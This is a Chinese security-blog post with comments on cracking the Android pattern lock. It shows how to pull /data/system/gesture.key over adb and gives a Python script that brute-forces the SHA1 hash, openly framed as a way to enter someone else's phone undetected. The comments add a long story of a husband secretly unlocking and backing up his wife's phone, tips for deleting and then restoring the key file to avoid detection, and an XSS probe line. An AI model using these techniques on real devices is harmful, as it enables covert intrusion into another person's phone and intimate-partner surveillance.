安卓手机的图形锁(九宫格)是3×3的点阵,按次序连接数个点从而达到锁定/解锁的功能。最少需要连接4个点,最多能连接9个点。网上也有暴力删除手机图形锁的方法,即直接干掉图形锁功能。但假如你想进入别人的手机,但又不想引起其警觉的话……你可以参考一下本文。
前提条件:手机需要root,而且打开调试模式。一般来讲,如果用过诸如“豌豆荚手机助手”、“360手机助手”一类的软件,都会被要求打开调试模式的。如果要删除手机内置软件,则需要将手机root。
原理分析
首先科普一下,安卓手机是如何标记这9个点的。通过阅读安卓系统源码可知,每个点都有其编号,组成了一个3×3的矩阵,形如:
00 01 02
03 04 05
06 07 08
假如设定解锁图形为一个“L”形,如图:
那么这几个点的排列顺序是这样的:00 03 06 07 08。系统就记下来了这一串数字,然后将这一串数字(以十六进制的方式)进行SHA1加密,存储在了手机里的/data/system/gesture.key 文件中。我们用数据线连接手机和电脑,然后ADB连接手机,将文件下载到电脑上(命令:adb pull /data/system/gesture.key gesture.key),如图:
用WinHex等十六进制编辑程序打开gesture.key,会发现文件内是SHA1加密过的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如图:
当你下次解锁的时候,系统就对比你画的图案,看对应的数字串是不是0003060708对应的加密结果。如果是,就解锁;不是就继续保持锁定。那么,如果穷举所有的数字串排列,会有多少呢?联想到高中的阶乘,如果用4个点做解锁图形的话,就是9x8x7x6=3024种可能性,那5个点就是15120,6个点的话60480,7个点181440,8个点362880,9个点362880。总共是985824种可能性(但这么计算并不严密,因为同一条直线上的点只能和他们相邻的点相连)。
满打满算,也不到985824种可能性。乍一看很大,但在计算机面前,穷举出来这些东西用不了几秒钟。
破解过程
知道了原理,就着手写程序来实现吧。这里使用了Python来完成任务。主要应用了hashlib模块(对字符串进行SHA1加密)和itertools模块(Python内置,生成00-09的排列组合)。
主要流程为:
1.ADB连接手机,获取gesture.key文件
2.读取key文件,存入字符串str_A
3.生成全部可能的数字串
4.对这些数字串进行加密,得到字符串str_B
5.将字符串str_A与str_B进行对比
6.如果字符串A,B相同,则说明数字串num就是想要的解锁顺序
7.打印出数字串num
下面为程序:
# -*- coding: cp936 -*- import itertools import hashlib import time import os #调用cmd,ADB连接到手机,读取SHA1加密后的字符串 os.system("adb pull /data/system/gesture.key gesture.key") time.sleep(5) f=open('gesture.key','r') pswd=f.readline() f.close() pswd_hex=pswd.encode('hex') print '加密后的密码为:%s'%pswd_hex #生成解锁序列,得到['00','01','02','03','04','05','06','07','08'] matrix=[] for i in range(0,9): str_temp = '0'+str(i) matrix.append(str_temp) #将00——08的字符进行排列,至少取4个数排列,最多全部进行排列 min_num=4 max_num=len(matrix) for num in range(min_num,max_num+1):#从04 -> 08 iter1 = itertools.permutations(matrix,num)#从9个数字中挑出n个进行排列 list_m=[] list_m.append(list(iter1))#将生成的排列全部存放到 list_m 列表中 for el in list_m[0]:#遍历这n个数字的全部排列 strlist=''.join(el)#将list转换成str。[00,03,06,07,08]-->0003060708 strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#将字符串进行SHA1加密 if pswd_hex==strlist_sha1:#将手机文件里的字符串与加密字符串进行对比 print '解锁密码为:',strlist
总结
从程序本身来说,得到解锁密码后应该用break跳出循环并终止程序运行。但Python并没有跳出多重循环的语句,如果要跳出多重循环,只能设置标志位然后不停进行判定。为了运行速度就略去了“跳出循环”这个步骤。(有没有更好的实现跳出多重循环的方法?)另外也略去了很多容错语句。从破解目的来说,如果单单是忘记了自己的手机图形锁密码,完全可以用更简单的办法:ADB连接手机,然后“adb rm /data/system/gesture.key”删除掉gesture.key文件,此时图形锁就失效了,随意画一下就能解锁。但本文开篇假设的是“为了不被察觉地进入到别人的手机里”,所以就有了这篇文章。
最后提一个安全小建议:如果手机已root,还要用“XX手机助手”,还想设置图形锁的话——在手机“设置”选项里,有一个“锁定状态下取消USB调试模式”(这个名字因手机而异,而且有的有此选项,有的手机就没有),开启此功能之后,在手机锁定状态下就能够防范此类攻击了。此文技术原理很简单,还望各位大大传授些高大上的Python编程技巧。
[作者/张召忠,属FreeBuf原创奖励计划文章,未经许可禁止转载]
-
發哥首先是我哥们儿(以下简称小李吧)出差了半个多月,期间和媳妇儿的联系都很正常,俩人结婚3年了,感情一直还不错,偶有争吵也没有涉及到原则问题,算是一对恩爱夫妻吧。
不过在小李出差之前的一个月,他媳妇儿的微信突然比以前频繁了起来,小李有时候问她是谁,她都会说是同事、闺蜜什么的,那时候小李并没有任何怀疑,他们俩对对方的生活也一直不太干涉的那种,基本上都是完全放心的。
就前几天,他偷偷给我叫出去,还特意告诉我别带媳妇儿出来,然后我就觉得肯定有事儿。
见这面以后,小李直接跟我说:“我觉得我媳妇儿可能是出轨了,而且还把男人带回家了。”
我当时就乐了,我说你这刚出差半个月媳妇儿就能出轨?他说你先别急,我说几个事儿给你分析分析,然后他就开始说。
首先是回家以后他媳妇儿的反应,都说“小别胜新婚”,这种感觉大家估计都经历过,除了那种常年出差最后双方都无感的,一般夫妻有一方出差,回来以后俩人都会新鲜一阵儿——不过小李说他媳妇儿这次没什么感觉,而且隐约觉得她不太希望他回来似的。
另外,小李媳妇儿不是那种特别爱收拾的女的,平常俩人都挺邋遢的,所以家里经常是东西胡乱放,但小李这次回去发现家里比以前干净整洁了不少,按他媳妇儿的话说是“趁他不在彻底收拾了一下”,但以前小李出差的时候也没见媳妇儿这样儿,所以他又觉得惊喜又觉得挺奇怪的。
说实话他说到这儿我都觉得是纯扯淡……
后面他跟我说的就有些逆天了。
小李扔下东西去洗澡,发现自己的洗面奶挤不出来了——临走的时候他记得还剩下一点,大概够用两次的量,但现在是完全没有了。
洗完了澡,小李想看电视——他俩在家看电视有个习惯,就是看完了以后不用遥控器关,直接关电视电源,然后还要把插电视电源的插线板关掉,那样算是彻底省电。不过小李打开插线板和电视电源以后,电视没直接点亮,然后他媳妇儿过来说让他用遥控器开。电视打开以后,声音很小,说才到13,但平常他俩在家正常的电视声音是25左右。
他还发现家里换了一套新的床单和被罩,旧的那个没有洗(因为没有晾出来),据他媳妇儿说是直接拿回娘家洗干净存起来了,因为快到冬天了,干脆换一套冬天用的……
然后他和他媳妇儿OOXX的时候,他发现抽屉里的TT换了一盒全新的——上次那盒在临走之前应该还剩最后一个,就扔在抽屉里,但是没有了。后来他偷偷的数了一下新的这盒里的数量,只有6个(10个装的)。
还有,小李发现媳妇儿用了个自己不太熟悉的香水,以前从未用过的。
说到这儿以后,大家是不是也觉得有些犯嘀咕?反正我是觉得有点儿奇怪了。
不好意思啊,码字儿不是很快,大家凑合看看吧,继续。
然后他就跟我说了一下到此为止的分析:
他媳妇儿出轨了,找了个男人,并且把男人带家里来了。
从TT的剩余数量来看,他俩在家至少是OOXX了4次,并且那个男人还在家洗了澡,用了小李的洗面奶;
这4次OOXX中,有3次肯定是在床上弄的,而且留下了痕迹(他家以前是米色的床单),所以床单被换了,旧的不是那个男的拿走了,就是直接扔了;
还有1次俩人是在沙发上OOXX的,当时电视是开着的,因为嫌吵所以用遥控器调小了声音,然后还是不行,就直接用遥控器关了电视。完事以后他媳妇儿又习惯性的把电视电源和电插板都关掉——这次OOXX就应该是小李到家前一天的晚上,因为之后她媳妇儿没再看过电视,而且怕再把新床单弄脏就没去床上;
说实话,我当时脑子里都出图儿了……
小李不淡定了,但是他还是忍住了没问,因为没有十足的证据。
第二天他把媳妇儿送走了,给公司打了个电话说太累了想休息一天,直奔家里搜集证据……
他从柜子里找到了媳妇儿用的那瓶香水,他对香水不太懂,总之看起来很贵的样子;然后在床周围的地上想看看有没有什么蛛丝马迹,不过他媳妇儿应该是吸过地,什么都没找着;不过沙发上有很大的收获:几根长短不一的头发和几根不知道是谁的下面的毛……
小李的媳妇儿是长发,他用头发和自己的头发比了比,确定肯定不是自己的,下面的毛没法儿比对,总之是小心翼翼的收起来了。
另外他还发现抽屉里多了个某地铁板烧的会员卡和优惠券,这个地方他们俩从没去过。
说实话我觉得这哥们儿不去演真人版柯南真有点儿可惜。
小李想上媳妇儿QQ看看,后来一想他媳妇儿上班儿呢肯定用着QQ呢,他这边儿一上那边儿肯定能发现。我就跟他说你用手机QQ呗,现在大部分人都开通了手机QQ和电脑同时在线,他说他也想到了,但是没上去,因为密码被换了。
这时候他基本确认了媳妇儿肯定是有点儿事儿。然后当天晚上回来,他趁媳妇儿去洗澡的工夫拿出媳妇儿手机就准备查看,结果发现手机密码也换了新的,在又气又急的时候,他想到一招儿,就是直接用电脑软件备份——他和他媳妇儿用的都是android手机,所以用电脑上的360备份一下是可以恢复到其他手机上的,这样不解锁也能看到信息了。
这招儿果然成功了,小李把媳妇儿手机上的短信备份到电脑上又恢复到了自己手机里,一顿排查以后终于发现了重大疑点:有一组信息是个不认识的男的和他媳妇儿发的,里面的内容虽然没有很明显的暧昧关系,但“微信上说吧”这句话出现了很多次。
看来不弄到微信还是不行啊。
小李媳妇儿应该是没发现他在调查自己,不过小李也有点儿一筹莫展,因为弄不到手机密码就看不见微信,看不到微信就拿不到有力的证据。他自己也研究了很多如何破解android系统图形密码的方法,除了后备问题和答案以外就只能刷机了,但是刷机以后所有用户信息就都没了,证据也被销毁了。
后来丫用了一个非常NB的招儿……
有一天晚上小李和媳妇儿坐在沙发上看电视,他突然掏出自己的手机给媳妇儿,又拿起家里座机,跟媳妇儿说你帮我找找XXX的电话,我有点儿事儿找他。然后他媳妇儿接过去以后,用图形解锁,第一次错了,第二次才解开,然后把电话告诉了他——小李断定媳妇儿输错的第一次肯定就是她自己手机的解锁码,虽然那只是一瞬间,但他用自己的12K氪金狗眼深深的记住了那个图形。
后来她媳妇儿去洗澡了,小李凭借着深刻的记忆在他媳妇儿手机上试了一下,果不其然,锁解开了。打开微信,什么都明白了,小李也傻了——小李的媳妇儿和奸夫在微信里各种调情,还互发照片,其中还有小李给媳妇儿买的新睡衣的照片……据他自己说那会儿脑袋已经快炸了,一片空白,不过知道了奸夫的长相,记住了微信号,并且确定这人和媳妇儿是一个公司的。
小李想了想,准备等媳妇儿自己露出马脚,收集到更多证据再说。果然过了两天,媳妇儿说自己晚上要加班儿弄招标,说估计很晚才回来。小李觉得这肯定有问题,然后就准备跟踪他媳妇儿。
小李去媳妇儿公司门口蹲点儿,结果到了晚上9点多还没蹲到,媳妇儿可能真是在加班儿,然后又过了一会儿媳妇儿给他打了个电话,说话的时候估计听见他身边儿的声音了就问小李是不是在外面呢,小李跟媳妇儿说自己跟同事在路边儿喝酒吃串儿呢,问她什么时候回来,他媳妇儿说估计还得有一会儿,让他早点儿回去。
等到10点多终于有动静了,小李跟马路对面看见自己媳妇儿和一个男的出来了,俩人没有任何亲热的举动,就是站在马路边儿聊天,然后拦了辆出租车,就在上车的一瞬间,媳妇儿的手和那个男的拉在了一起。
小李当时心都凉了,准备回家跟媳妇儿摊牌,他也打了个车往家走。到家以后发现媳妇儿还没回来,就给她打了个电话,媳妇儿半天才接,小李问她什么时候回来,媳妇儿说估计得到12点多,小李说你注意身体然后就挂了(我觉得这“注意身体”说的真挺帅的)。
大概12点多,小李把媳妇儿等回来了,他媳妇儿有点儿意外,问小李怎么还没睡,小李说我这两天一直琢磨个事儿,想跟你讨论一下。 然后就把之前那些分析给他媳妇儿说了,说完了小李痛快了,他媳妇儿傻在那儿了。然后小李说我今儿去你们公司门口儿了,你们俩一起拉着手上的出租车对吧,我认识那男的,微信上看过他照片。 之后他媳妇儿全都承认了,说那个男的是这半年刚去的,是她媳妇儿的高中同学,在另一个部门,他们一起配合招标所以接触比较密切,慢慢的就一起吃饭啊,出去唱歌什么的,然后就发展到现在这一步,而且之前小李分析的那些都是对的,他媳妇儿怕小李发现就换了床单,但是TT她以为小李不会注意就没换,而且俩人的确在沙发上来了一下儿,就是在小李回来的前一天晚上…… 小李一夜没睡,第二天就找我来了,问我看这事儿怎么办。我问他媳妇儿是怎么想的,他说他媳妇儿不想离婚,说会辞职和那个男的断绝关系,我说你自己想好了吧,这事儿不是小事儿,我现在说你和她之间爱不爱什么的都是扯淡。 -
發哥小李媳妇儿应该是没发现他在调查自己,不过小李也有点儿一筹莫展,因为弄不到手机密码就看不见微信,看不到微信就拿不到有力的证据。他自己也研究了很多如何破解android系统图形密码的方法,除了后备问题和答案以外就只能刷机了,但是刷机以后所有用户信息就都没了,证据也被销毁了。
后来丫用了一个非常NB的招儿……
有一天晚上小李和媳妇儿坐在沙发上看电视,他突然掏出自己的手机给媳妇儿,又拿起家里座机,跟媳妇儿说你帮我找找XXX的电话,我有点儿事儿找他。然后他媳妇儿接过去以后,用图形解锁,第一次错了,第二次才解开,然后把电话告诉了他——小李断定媳妇儿输错的第一次肯定就是她自己手机的解锁码,虽然那只是一瞬间,但他用自己的12K氪金狗眼深深的记住了那个图形。 -
其实有个更简单的方法,不用那么麻烦。我说出来大家不喜欢别喷。 如果他(她)手机root了,连接电脑后,大家可以下载root精灵,里面有个找回锁屏密码这功能,这功能非常强大,几秒就可以破解图形锁了。 -
kyrios思路不错,其实可以进一步,先删掉,然后做完坏事再恢复回去。。 -
马云@ 發哥 我竟然也看完了
关注我们 分享每日精选文章
不容错过
- 开源的理念做安全:FreeBuf与HackerOne COO王宁对谈安全众测欧阳洋葱2017-04-25
- 一款猥琐的PHP后门分析360网站卫士2014-03-19
- 混搭新式:社工+powershell,轻松畅游主机东二门陈冠希2016-05-30
- 这个19KB的“成人影集”到底做了什么?expsky2016-11-03
Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
0daybank
已有 91 条评论
RSS怎麼用不了了???
首先是我哥们儿(以下简称小李吧)出差了半个多月,期间和媳妇儿的联系都很正常,俩人结婚3年了,感情一直还不错,偶有争吵也没有涉及到原则问题,算是一对恩爱夫妻吧。
不过在小李出差之前的一个月,他媳妇儿的微信突然比以前频繁了起来,小李有时候问她是谁,她都会说是同事、闺蜜什么的,那时候小李并没有任何怀疑,他们俩对对方的生活也一直不太干涉的那种,基本上都是完全放心的。
就前几天,他偷偷给我叫出去,还特意告诉我别带媳妇儿出来,然后我就觉得肯定有事儿。
见这面以后,小李直接跟我说:“我觉得我媳妇儿可能是出轨了,而且还把男人带回家了。”
我当时就乐了,我说你这刚出差半个月媳妇儿就能出轨?他说你先别急,我说几个事儿给你分析分析,然后他就开始说。
首先是回家以后他媳妇儿的反应,都说“小别胜新婚”,这种感觉大家估计都经历过,除了那种常年出差最后双方都无感的,一般夫妻有一方出差,回来以后俩人都会新鲜一阵儿——不过小李说他媳妇儿这次没什么感觉,而且隐约觉得她不太希望他回来似的。
另外,小李媳妇儿不是那种特别爱收拾的女的,平常俩人都挺邋遢的,所以家里经常是东西胡乱放,但小李这次回去发现家里比以前干净整洁了不少,按他媳妇儿的话说是“趁他不在彻底收拾了一下”,但以前小李出差的时候也没见媳妇儿这样儿,所以他又觉得惊喜又觉得挺奇怪的。
说实话他说到这儿我都觉得是纯扯淡……
后面他跟我说的就有些逆天了。
小李扔下东西去洗澡,发现自己的洗面奶挤不出来了——临走的时候他记得还剩下一点,大概够用两次的量,但现在是完全没有了。
洗完了澡,小李想看电视——他俩在家看电视有个习惯,就是看完了以后不用遥控器关,直接关电视电源,然后还要把插电视电源的插线板关掉,那样算是彻底省电。不过小李打开插线板和电视电源以后,电视没直接点亮,然后他媳妇儿过来说让他用遥控器开。电视打开以后,声音很小,说才到13,但平常他俩在家正常的电视声音是25左右。
他还发现家里换了一套新的床单和被罩,旧的那个没有洗(因为没有晾出来),据他媳妇儿说是直接拿回娘家洗干净存起来了,因为快到冬天了,干脆换一套冬天用的……
然后他和他媳妇儿OOXX的时候,他发现抽屉里的TT换了一盒全新的——上次那盒在临走之前应该还剩最后一个,就扔在抽屉里,但是没有了。后来他偷偷的数了一下新的这盒里的数量,只有6个(10个装的)。
还有,小李发现媳妇儿用了个自己不太熟悉的香水,以前从未用过的。
说到这儿以后,大家是不是也觉得有些犯嘀咕?反正我是觉得有点儿奇怪了。
不好意思啊,码字儿不是很快,大家凑合看看吧,继续。
然后他就跟我说了一下到此为止的分析:
他媳妇儿出轨了,找了个男人,并且把男人带家里来了。
从TT的剩余数量来看,他俩在家至少是OOXX了4次,并且那个男人还在家洗了澡,用了小李的洗面奶;
这4次OOXX中,有3次肯定是在床上弄的,而且留下了痕迹(他家以前是米色的床单),所以床单被换了,旧的不是那个男的拿走了,就是直接扔了;
还有1次俩人是在沙发上OOXX的,当时电视是开着的,因为嫌吵所以用遥控器调小了声音,然后还是不行,就直接用遥控器关了电视。完事以后他媳妇儿又习惯性的把电视电源和电插板都关掉——这次OOXX就应该是小李到家前一天的晚上,因为之后她媳妇儿没再看过电视,而且怕再把新床单弄脏就没去床上;
说实话,我当时脑子里都出图儿了……
小李不淡定了,但是他还是忍住了没问,因为没有十足的证据。
第二天他把媳妇儿送走了,给公司打了个电话说太累了想休息一天,直奔家里搜集证据……
他从柜子里找到了媳妇儿用的那瓶香水,他对香水不太懂,总之看起来很贵的样子;然后在床周围的地上想看看有没有什么蛛丝马迹,不过他媳妇儿应该是吸过地,什么都没找着;不过沙发上有很大的收获:几根长短不一的头发和几根不知道是谁的下面的毛……
小李的媳妇儿是长发,他用头发和自己的头发比了比,确定肯定不是自己的,下面的毛没法儿比对,总之是小心翼翼的收起来了。
另外他还发现抽屉里多了个某地铁板烧的会员卡和优惠券,这个地方他们俩从没去过。
说实话我觉得这哥们儿不去演真人版柯南真有点儿可惜。
小李想上媳妇儿QQ看看,后来一想他媳妇儿上班儿呢肯定用着QQ呢,他这边儿一上那边儿肯定能发现。我就跟他说你用手机QQ呗,现在大部分人都开通了手机QQ和电脑同时在线,他说他也想到了,但是没上去,因为密码被换了。
这时候他基本确认了媳妇儿肯定是有点儿事儿。然后当天晚上回来,他趁媳妇儿去洗澡的工夫拿出媳妇儿手机就准备查看,结果发现手机密码也换了新的,在又气又急的时候,他想到一招儿,就是直接用电脑软件备份——他和他媳妇儿用的都是android手机,所以用电脑上的360备份一下是可以恢复到其他手机上的,这样不解锁也能看到信息了。
这招儿果然成功了,小李把媳妇儿手机上的短信备份到电脑上又恢复到了自己手机里,一顿排查以后终于发现了重大疑点:有一组信息是个不认识的男的和他媳妇儿发的,里面的内容虽然没有很明显的暧昧关系,但“微信上说吧”这句话出现了很多次。
看来不弄到微信还是不行啊。
小李媳妇儿应该是没发现他在调查自己,不过小李也有点儿一筹莫展,因为弄不到手机密码就看不见微信,看不到微信就拿不到有力的证据。他自己也研究了很多如何破解android系统图形密码的方法,除了后备问题和答案以外就只能刷机了,但是刷机以后所有用户信息就都没了,证据也被销毁了。
后来丫用了一个非常NB的招儿……
有一天晚上小李和媳妇儿坐在沙发上看电视,他突然掏出自己的手机给媳妇儿,又拿起家里座机,跟媳妇儿说你帮我找找XXX的电话,我有点儿事儿找他。然后他媳妇儿接过去以后,用图形解锁,第一次错了,第二次才解开,然后把电话告诉了他——小李断定媳妇儿输错的第一次肯定就是她自己手机的解锁码,虽然那只是一瞬间,但他用自己的12K氪金狗眼深深的记住了那个图形。
后来她媳妇儿去洗澡了,小李凭借着深刻的记忆在他媳妇儿手机上试了一下,果不其然,锁解开了。打开微信,什么都明白了,小李也傻了——小李的媳妇儿和奸夫在微信里各种调情,还互发照片,其中还有小李给媳妇儿买的新睡衣的照片……据他自己说那会儿脑袋已经快炸了,一片空白,不过知道了奸夫的长相,记住了微信号,并且确定这人和媳妇儿是一个公司的。
小李想了想,准备等媳妇儿自己露出马脚,收集到更多证据再说。果然过了两天,媳妇儿说自己晚上要加班儿弄招标,说估计很晚才回来。小李觉得这肯定有问题,然后就准备跟踪他媳妇儿。
小李去媳妇儿公司门口蹲点儿,结果到了晚上9点多还没蹲到,媳妇儿可能真是在加班儿,然后又过了一会儿媳妇儿给他打了个电话,说话的时候估计听见他身边儿的声音了就问小李是不是在外面呢,小李跟媳妇儿说自己跟同事在路边儿喝酒吃串儿呢,问她什么时候回来,他媳妇儿说估计还得有一会儿,让他早点儿回去。
等到10点多终于有动静了,小李跟马路对面看见自己媳妇儿和一个男的出来了,俩人没有任何亲热的举动,就是站在马路边儿聊天,然后拦了辆出租车,就在上车的一瞬间,媳妇儿的手和那个男的拉在了一起。
小李当时心都凉了,准备回家跟媳妇儿摊牌,他也打了个车往家走。到家以后发现媳妇儿还没回来,就给她打了个电话,媳妇儿半天才接,小李问她什么时候回来,媳妇儿说估计得到12点多,小李说你注意身体然后就挂了(我觉得这“注意身体”说的真挺帅的)。
大概12点多,小李把媳妇儿等回来了,他媳妇儿有点儿意外,问小李怎么还没睡,小李说我这两天一直琢磨个事儿,想跟你讨论一下。 然后就把之前那些分析给他媳妇儿说了,说完了小李痛快了,他媳妇儿傻在那儿了。然后小李说我今儿去你们公司门口儿了,你们俩一起拉着手上的出租车对吧,我认识那男的,微信上看过他照片。 之后他媳妇儿全都承认了,说那个男的是这半年刚去的,是她媳妇儿的高中同学,在另一个部门,他们一起配合招标所以接触比较密切,慢慢的就一起吃饭啊,出去唱歌什么的,然后就发展到现在这一步,而且之前小李分析的那些都是对的,他媳妇儿怕小李发现就换了床单,但是TT她以为小李不会注意就没换,而且俩人的确在沙发上来了一下儿,就是在小李回来的前一天晚上…… 小李一夜没睡,第二天就找我来了,问我看这事儿怎么办。我问他媳妇儿是怎么想的,他说他媳妇儿不想离婚,说会辞职和那个男的断绝关系,我说你自己想好了吧,这事儿不是小事儿,我现在说你和她之间爱不爱什么的都是扯淡。
@ 發哥 擦,我竟然全看完了你这水文,还以为有啥新奇的呢!
@ 小包菜 我也看完了,我去
@ 發哥 我竟然也看完了
@ 發哥 转载 草榴 的。。
@ 工程牛人 暴露了
@ 發哥 我去 我居然也看完了
@ 發哥 我TM竟然看完了、、、
思路不错,其实可以进一步,先删掉,然后做完坏事再恢复回去。。
这个好
@ kyrios 最开始看成了无限制adb删文件。。当时就觉得思密达了。
@ kyrios 还有也可以先做好彩虹表(方便对多个手机下手),然后一查询就出来
哦 我用肾六
小李媳妇儿应该是没发现他在调查自己,不过小李也有点儿一筹莫展,因为弄不到手机密码就看不见微信,看不到微信就拿不到有力的证据。他自己也研究了很多如何破解android系统图形密码的方法,除了后备问题和答案以外就只能刷机了,但是刷机以后所有用户信息就都没了,证据也被销毁了。
后来丫用了一个非常NB的招儿……
有一天晚上小李和媳妇儿坐在沙发上看电视,他突然掏出自己的手机给媳妇儿,又拿起家里座机,跟媳妇儿说你帮我找找XXX的电话,我有点儿事儿找他。然后他媳妇儿接过去以后,用图形解锁,第一次错了,第二次才解开,然后把电话告诉了他——小李断定媳妇儿输错的第一次肯定就是她自己手机的解锁码,虽然那只是一瞬间,但他用自己的12K氪金狗眼深深的记住了那个图形。
python中可以把多重循环部分定义为一个函数,用return跳出
既然这个key文件可以删除打开,那也可以自己设置一个密码,然后给他覆盖进去,然后用自己的密码去登陆,不过这样也会察觉,没多大意义。
顶一下楼主的好文!
@ Hemlet 其实也可以删掉key文件而不被察觉啊,只需要将原始的key文件备份出来,然后等搞完小动作之后再替换回去就行了吧?这样密码还是原来的密码
删除后,登录手机后,然后又复制回去啊。。。这样就多省事的。
我不会编程,不过穷举这种东西,可以使用sql和excel组合来完成
最主要的还是要root+调试模式打开。
连接上电脑直接用XX大师还有XX刷机助手一键清除密码就是了
@ cqdaidong 直接清除了之后对方下次用手机不就发了吗?
弱弱的问一句,图形解锁用的是SHA1加密,那如果用的是数字密码怎么破呢?
@ hxdef_tiffany 好像是password.key
感觉跟看雪的那篇差不多呢……
这就是我坚持不ROOT的原因之一
可以先写个字典,把那几个常见的手势写进去,先跑跑,也许很快啊
看雪不是N年前就有了么?
@ JoyChou 评论比文章更亮
os.system("adb pull /data/system/gesture.key gesture.key")
第一句显示执行不了,显示“Permission denied”
求指导..需要怎么赋予权限啊
@ 水波摇曳 sudo 一下 擦擦
其实有个更简单的方法,不用那么麻烦。我说出来大家不喜欢别喷。 如果他(她)手机root了,连接电脑后,大家可以下载root精灵,里面有个找回锁屏密码这功能,这功能非常强大,几秒就可以破解图形锁了。
adb pull 提示Permission denied,Root已开,提前输入adb root也没用0.0
@ 532000663 我也是这样
亲测可用,直接用软件多省事!!@
这个故事真的很厉害!
我还以为有什么新亮点,看雪早就有了
多重循环可以写到一个函数里 然后满足条件直接return可以的吧
感觉好像在哪看过的
如果脚本在Windows上运行,请将最开始的编码模式改为utf-8,提示“Permission denied”的话,在os.system("adb pull /data/system/gesture.key gesture.key")前面加一句os.system("adb root")就可以了
@ GreyH4t 看起来好像对了…你却没有想到os.system("adb root")的执行条件是su管理器先对adb授权了root,否则需要解锁屏幕点击允许授权…别说你的su管理工具默认允许授权…
早八辈子看过了~
感觉好像在哪看过的
N年前的内容了……
嘿嘿 围观下
首先对于博主的多重循环跳出问题,可以这样解决:将代码封装成函数,要退出的地方直接使用return 即可。
其次解密出来的密码,可以用更好的效果展现出来,如解密密码为:0003070502,则显示出结果:
解锁图案如下(数字表示顺序):
1 0 5
2 0 4
0 3 0
数字表示了连接顺序。
python 代码如下
def analyze(code):
#code = 0003070502
pic = ['0','0','0','0','0','0','0','0','0']
code_len = len(code)
seq = 1
for i in range(1,code_len, 2): #读取code中的数字,如0003070502,读出0,3,7,5,2
digit = int(code[i])
pic[digit] = str(seq) #设置pic中相应位置
seq += 1
print ‘解锁图案如下(数字表示顺序):’
for i,c in enumerate(pic):
if i > 0 and i % 3 == 0:
print ”
print ‘%4s’ % c,
@ JarvisChu +1 用try也可以
多重循环用try可以吧,break换成raise。
@ weiy exit() 不可以么?
既然是SHA1,用hashcat那不是更快吗
实测小米2S把gestrue.key删了图形解锁未失效
擦 我竟然看完了
他这个文章就有点软肋 既然删除就能不要密码进手机那直接下载这个文件 然后再手机删除 等得到想要的东西在吧文件上传到手机 为何还要下载破解那
太麻烦了
再说了现在好多人就是装逼 比如我 不会编程 跟别说py了 那些普通人能用py写个破解密码的软件吗 ? 即使你给出了代码他们也写不出来
比如我就只会装逼 不会编程
加个exit() 很难么。。
发哥威武
@ 浆泥 我活了
楼上的出来单挑
安卓4.x(具体哪个版本开始这样的不了解)以上,陌生电脑(指未使用调试模式连接过此手机的电脑)首次连接调试模式需要解锁屏幕点击"允许",楼主先洗洗睡.
测试手机 :htc one
看完了评论里的水文
假如想进入手机而不被察觉,我有办法!偷看!!
评论有彩蛋啊 可怕的工科男[笑cry]
哈哈,工科男就这样
0003060708 用sha1加密结果是 9146772455130e8d57d72d44352686f9c8dd7fe8
0003060708 用16进制表示是30303033303630373038,对用sha1加密是dd44a1554ac11cbc810b9d5901edc09b7bb03170
刚才话没打完,博主加密那块能详细说一下么,小白不胜感激
你想干嘛?
破解安卓
最近你不转恶心恶俗的微博感觉不像你本人啊
我靠,黑我
[打脸]
<script>alert(123);</script>